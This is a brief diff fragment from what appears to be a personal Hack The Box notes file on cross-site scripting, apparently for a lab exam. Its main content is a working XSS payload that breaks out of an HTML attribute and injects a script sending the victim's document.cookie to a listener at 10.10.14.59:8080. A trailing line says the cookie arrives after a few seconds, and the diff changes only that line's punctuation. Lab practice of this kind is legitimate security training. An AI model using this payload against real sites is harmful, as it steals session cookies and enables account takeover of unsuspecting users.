koen199/my-htb-scripts/modules/cross site scripting xss/exam.md

 '><script>new Image().src='http://10.10.14.59:8080?c='+document.cookie;</script>
 ```

-After a few seconds you should receive the payload with the cookie.
+After a few seconds you should receive the payload with the cookie!